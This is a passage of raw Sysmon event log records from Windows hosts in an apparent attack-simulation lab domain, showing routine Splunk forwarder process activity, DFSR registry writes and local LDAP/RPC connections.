Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=694139311A45B5DBBEAAD13DE7FE1C7B,SHA256=3F2CEBD5E76E90DA39B65DD644B90B1969C8A377383CEE83B90381E81D2E4265,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.559{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001051737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.543{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001051736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.543{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 23542300x80000000000000001051735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4777CA860206E711B474441468C148CB,SHA256=72FB7D68192E8586F06B6D0C4D25DEB33C35E311D120517CE55B04E1793551A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.459{466BC892-F63C-60EB-957D-00000000CF01}76769832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.191{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.722{466BC892-F63D-60EB-977D-00000000CF01}48284580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9160E941921FD50BC229B6B420607DC,SHA256=54BA87326781B4B7ABA08EB6B506FAF5D82DCAD170F00AF22A85DE6F5539FF76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:53.015{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A4695754B5C3979403FA136725C93C,SHA256=85D877618B8B0B52C794670DCE101D9FBC28FA0DD27653BDC7D357A91E1EA519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.559{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=652E0604C55199A6CD7E43AE1607F6A7,SHA256=50EA05E4C0DA867D086B93FE9A26924FA189D38601BD94EAD3E26E3AB5A477F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.521{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.506{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.622{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD0164F8FD546422FEE195AD3A312353,SHA256=5BAC97F44B67FE1A77DC7D2305DF0242A69DB7DD0BC9534E79C9036F43E2C531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:54.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B887F6157F36D9D7DF04141103789F1,SHA256=F91C7CF1CDCD93346BD1B016C64D6CB374104445DBF7876FF20B09F6DE4F6ACF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.099{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51117-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.099{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51117-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.074{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51116-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.074{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51116-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001051766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 